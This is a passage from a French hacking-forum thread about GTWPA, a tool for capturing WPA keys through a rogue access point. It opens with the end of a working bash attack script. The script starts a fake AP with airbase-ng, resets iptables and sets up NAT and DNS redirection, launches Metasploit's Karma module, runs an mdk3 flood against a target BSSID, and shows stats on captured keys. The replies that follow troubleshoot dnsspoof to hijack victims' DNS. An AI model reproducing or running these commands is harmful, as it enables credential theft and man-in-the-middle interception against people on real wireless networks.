iwconfig $inject channel $chan
airbase-ng $inject -a $bssid -F capture &
sleep 2
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
killall -9 httpd
cd /
cd etc
echo > dhcpd.leases
killall dhcpd
dhcpd -q -cf /etc/dhcpd.conf -lf dhcpd.leases at0
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $router
iptables --table nat --append POSTROUTING --out-interface $inet -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc &
sleep 5
$0;;
# Autres attaques
8)
mdk3 -x 1 -t $bssid $inject
$0;;
#Stats GTWPA
9)
clear
echo -e $intro
echo -e "--> Statistiques GTWPA"
echo -e "--> Visualisation de http://127.0.0.1/stats.php"
sleep 5
rm -f -r /root/GTWPA/server/rogue/stats.php
cp /root/GTWPA/stats/stats.php /root/GTWPA/server/rogue/stats.php
firefox 127.0.0.1/stats.php
$0;;
esac

#Et voila, la première version de notre petit tool. L'installation et la partie "serveur rogue" sont #opérationnels, il reste à implémenter
#l'attaque (ou les différentes attaques) airbase-ng, récupérer les clés dans les stats...
#
#http://www.crack-wifi.com/forum/
#
#Changelog
#Pas encore de changelog lol
#Non mais on peu mettre un to Do
# 1)Pb graphique page neufbox

Dernière modification par seb-taz (01-12-2008 09:36:44)

Hors Ligne

#49 30-11-2008 23:36:01

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Je crois qu'il y a des choses intéressantes à tester, entre autres niveau gestion des interfaces wifi et routage, ça va surement aider, merci seb-taz smile

Hors Ligne

#50 01-12-2008 09:56:03

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Salut seb-taz

J'ai regardé ton script qui est maintenant un mix des 3 (avec celui que tu as posté avant d'éditer), dans la partie Rogue transparente je crois qu'il y a un coquille de variable entre $routeur et $router.

Sinon tu utilises karmasploit c'est une bonne idée, mais de mon coté je remplacerai ça chez moi par un ettercap ou wireshark.

Enfin ce qui m'intéresse le plus c'est le code que tu as posté avant d'éditer ton message, celui où tu utilises dnsspoof. Est-ce que ca marche chez toi ? Car chez moi non.
J'ai remplacé dnspoison par dnsspoof -i at0 -f dns.txt (avec 10.0.0.1 *.* dans dns.txt)
ou encore meme sans le -f dns.txt et rien ne marche, sur le pc victime j'ai un problème de dns.

Comment as-tu fais?

Dernière modification par Atrax (01-12-2008 09:56:43)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
12 209 Hier 22:42:30 par Morpheus_Dotcom
106 2201 28-11-2016 19:42:10 par koala
35 1856 23-11-2016 16:31:33 par roofnat
16 1048 17-11-2016 12:22:00 par disquette
10 440 11-11-2016 22:11:03 par koala

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.038 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]